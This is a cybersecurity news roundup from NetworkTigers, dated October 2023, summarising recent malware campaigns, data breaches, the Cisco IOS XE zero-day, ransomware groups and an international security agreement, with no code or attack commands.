SAN MATEO, CA, October 23, 2023 — Cybersecurity news weekly roundup. Stories, news, politics, and events that impacted the network security industry last week. Brought to you by NetworkTigers.
- DarkGate malware being spread via fake Corsair job offers on LinkedIn
- Lazarus hackers target defense experts with fraudulent job interviews
- Millions of 23andMe user records leaked onto cybercrime forum
- Thousands of Cisco IOS XE systems compromised by just announced zero-day flaw
- FBI warns that plastic surgery patients are being targeted by hackers
- Tens of thousands of admin accounts found to be using default passwords
- Healthcare sector warned of new NoEscape ransomware group
- Discord, already popular with hackers, being abused more frequently by APTs
- Cisco IOS XE zero-day flaw under active exploitation in the wild
- New evasion tactic spotted as ShellBot cracks Linux SSH servers
- SpyNote Android trojan records audio and phone calls
- Safeguarding financial sector from ransomware and cyberattacks
DarkGate malware being spread via fake Corsair job offers on LinkedIn
A Vietnamese threat actor group responsible for the Ducktail credential stealing campaign has been observed using fake LinkedIn posts advertising a Facebook Ads specialist positions at Corsair. The posts lure victims into downloading info-stealing malware such as DarkGate and RedLine. The campaign is mostly targeting users in the US, the UK, and India who occupy social media management roles. Victims download a malicious file that launches a script, de-obfuscates itself and then “constructs DarkGate using strings present in the script.” Read more.
Lazarus hackers target defense experts with fraudulent job interviews
The North Korean hacker collective, Lazarus Group, has been using trojanized Virtual Network Computing (VNC) apps as bait to lure defense industry and nuclear engineers into fake job interviews. Job seekers are tricked into clicking links that lead to malicious apps that “retrieve additional payloads, including a known Lazarus Group malware dubbed LPEClient, which comes fitted with capabilities to profile compromised hosts.” North Korea’s state-sponsored group continues to evolve to maintain its effectiveness, with Mandiant saying that their “threat activity continues to adapt and change to build tailored malware for different platforms, including Linux and macOS.” Read more.
Millions of 23andMe user records leaked onto cybercrime forum
A hacker that released data stolen from genetic testing company 23andMe two weeks ago has followed up with a massive leak that contains data associated with four million users of the platform. The hacker, going by the name of Golem, claims that the information contains data from “the wealthiest people living in the U.S. and Western Europe.” It’s not currently known how the hacker gathered the data, but 23andMe has thus far stated that weak password hygiene of its users as well as a feature called “DNA Relatives” that lets users see the data of others are both contributing factors. 23andMe is reportedly assessing the breach but it has not disclosed the full extent of the damage done. Read more.
Thousands of Cisco IOS XE systems compromised by just-announced zero-day flaw
A just-disclosed maximum severity bug (CVE-2023-20198) within Cisco’s IOS XE systems is already under active exploitation with at least 10,000 instances falling victim to what experts believe is a single opportunistic threat actor who is “casting a wide net.” The instances of attack are not centralized, with victimized systems appearing globally across a number of countries. Cisco has not yet released a patch for the threat, but is recommending that organizations with affected systems disable the HTTPS Server feature on internet-facing IOS XE devices. They also assure users that they are “working non-stop” to develop and provide a fix. Read more.
FBI warns that plastic surgery patients are being targeted by hackers
According to a warning from the FBI, plastic surgery centers are being targeted by hackers who steal personal health data from them to extort doctors and patients. The FBI’s statement says that once information is taken, “attackers demand a ransom from plastic surgeons and patients to prevent sharing this data, which often includes sensitive photographs.” The attacks are launched via phishing messages send to doctors’ offices that include a malicious link that, when clicked, deploys malware. After the malware harvests data, attackers then turn to social media and social engineering tactics to “enhance” the information. The cybercriminals then attempt to extort doctors and patients through social media messaging, by sending photos to family and colleagues, and even by creating public facing websites that contain the sensitive info. Read more.
Tens of thousands of admin accounts found to be using default passwords
Threat Compass has reported that, after analyzing a pool of over 1.8 million administrator credentials, more than 40,000 accounts used “admin” as their password, revealing that the use of default passwords is prevalent even among IT professionals. Other weak credentials noted by Threat Compass include “1234,” “demo,” “root,” and a number of other easily guessed passwords that security experts recommend changing immediately. Admin portals are especially attractive targets for hackers, as they can “provide access related to configuration, accounts, and security settings” as well as allow for tracking customers and orders.” Read more.
Healthcare sector warned of new NoEscape ransomware group
Healthcare organizations are being warned of a new ransomware-as-a-service provider called NoEscape that is actively targeting professional services, manufacturing, and information industries. However, the group has also been observed indiscriminately setting its sights on the healthcare and public health sector. Believed to be a rebrand of Russian threat actor Avaddon, NoEscape has “unique features and aggressive multi-extortion tactics,” according to the US Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center. NoEscape demands that its ransoms be paid in cryptocurrency. Read more.
Discord, already popular with hackers, being abused more frequently by APTs
Discord, already a hotbed of malicious activity, is now also being utilized by APT groups to target critical infrastructure. According to research from Trellix, sophisticated hacking groups are turning to Discord to help obfuscate their activities by blending them in with the myriad of other, less complex threat actor activity on the platform. For its part, Discord has been largely unable to lessen or curtail the use of its platform in nefarious activities, as the features threat actors abuse have legitimate purposes for other users. “APTs are known for their sophisticated and targeted attacks, and by infiltrating widely used communication platforms like Discord, they can efficiently establish long-term footholds within networks, putting critical infrastructure and sensitive data at risk,” reads Trellix’ report. Read more.
Cisco IOS XE zero-day flaw under active exploitation in the wild
A zero-day flaw within Cisco’s IOS XE software is under attack from hackers, the company warns. The vulnerability (CVE-2023-20198), which is yet to be patched, is “rooted in the web UI feature” and has received the maximum severity rating of 10 via the CVSS scoring system. In an advisory, Cisco said that the flaw “allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.” The vulnerability can only be exploited on enterprise networking gear exposed to the internet or untrusted networks with the Web UI feature enabled. Read more.
New evasion tactic spotted as ShellBot cracks Linux SSH servers
Linux SSH servers are being attacked by cybercriminals using ShellBot, a common malware that “uses dictionary attacks to compromise servers that have weak SSH credentials” and enlists targeted systems for DDoS attacks. The criminals have been observed using hexadecimal IP (Hex IP) addresses to evade detection, a new tactic that has caught the attention of cybersecurity researchers. According to the ASEC advisory on Hex IP attacks, “IP addresses can be expressed in formats other than the dot-decimal notation, including decimal and hexadecimal notations, and are generally compatible with widely used Web browsers.” ShellBot can therefore be “downloaded successfully on a Linux system environment and executed through Perl.” Thankfully, this campaign can be thwarted by maintaining good password hygiene. Read more.
SpyNote Android trojan records audio and phone calls
Android users are being urged to beware of a banking trojan called SpyNote that has “diverse information-gathering features” that include the ability to access a victim’s call logs, camera, SMS messages, and external storage. Troublingly, it “seeks accessibility permissions, subsequently leveraging it to grant itself additional permissions to record audio and phone calls, log keystrokes, as well as capture screenshots of the phone.” Spread though SMS phishing campaigns, SpyNote is installed on a victim’s device after they click a malicious link. Uninstallation is also difficult, with users having to perform a complete factory reset to remove the malware. Read more.
Safeguarding financial sector from ransomware and cyberattacks
The US Department of the Treasury and the Cyber Security Council of the United Arab Emirates (UAE) have finalized a bilateral Memorandum of Understanding between the two countries and are announcing a new collaboration to address cybersecurity threats together. The initiative involves increased information sharing relating to cybersecurity threats in the financial sector, shared staff training and study visits, as well as cross-border data security exercises. Read more.